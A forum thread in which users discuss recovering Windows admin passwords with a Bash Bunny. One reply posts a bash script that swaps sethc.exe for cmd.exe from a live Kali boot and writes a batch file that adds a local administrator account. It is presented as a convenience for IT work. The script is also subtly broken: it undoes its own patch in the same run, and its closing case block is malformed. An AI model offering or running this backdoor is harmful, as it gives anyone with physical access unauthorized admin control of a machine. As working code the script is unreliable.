Jump to content

Get Administrative Password from machine


Recommended Posts


I just ordered a Bash Bunny, and am eager to start playing around with it. I work in the IT world, and a common complaint with new clients is they've forgotten their Windows Admin Passwords. Generally we would just go in there with the well known windows exploit to get that going, however I'm wondering if there was a way to get the bunny to do that faster, and easier.

My question is, not knowing the admin password, and not being able to login to the computer (or being able to log in as only a USER not an admin) is there a way to have the bunny pull the password (or even the hash?)

Link to comment
Share on other sites

If you can type it, you can have the bunny do it.


However; as the local admin password is encrypted i would not know a way to extract that.

Booting an (unencrypted) disk with any repair disk would reset it; not retrieve it, However, the bunny is unable to do this.


Link to comment
Share on other sites

Also to extract the hash is not gonna work as the hash files are locked into the computer, even from an admin terminal. im working on a ducky script to extract the hash to crack offline but as you see problems, some research is due.


Edited by Bigbiz
Link to comment
Share on other sites

  • 1 month later...

Or, just boot from a Kali Live system, mount the Windows drive.

------------sethcpatch.sh v2 start--------------

#! /bin/bash
# cmd.exe --> sethc.exe copy patch
# Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, utestet på Server 2016
# Version 0.2 - Juni 2018
# By kent j <kent@labet.dk> 

	echo "Run with patchwin / unpatchwin"

{ echo "patching windows sethc function...."
sleep 2

mkdir patch
cp sethc.exe patch/sethc.bak
cp cmd.exe patch/cmd.bak
rm sethc.exe
cp cmd.exe sethc.exe
echo "patching done ......"

sleep 2

echo "Writing windows bat file..."
cd patch
touch useradd.bat
echo "net user /add USER PASS" >useradd.bat
echo "net localgroup administratorer USER /add" >>useradd.bat
cd ..

sleep 2

echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
echo "Run with useradd.bat"
sleep 2

echo "unpatch Windows sethc.exe"
sleep 2
rm sethc.exe
rm cmd.exe
cd patch
cp sethc.bak ../sethc.exe
cp cmd.bak ../cmd.exe
cd ..
rm -rf patch
sleep 2
echo "Cleanup ended !"
echo "sethc.exe & cmd.exe back to normal..."
echo "Script terminated... "
case $1 in

help) HELP
patchwin) PATCH_WIN
unpatchwin) UNPATCH_WIN

exit 0

-----------------sethcpatch.sh v2 End------------------

just add this to a custom Kali under /opt/tools/local/win (or whereever you like)
Makes your life soo much easier when users are forgettng their passwords :D

For use, copy it to the local windrive and run it.
When in windows terminal, run the bat file.

Log in, and enjoy admin privs :)


Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...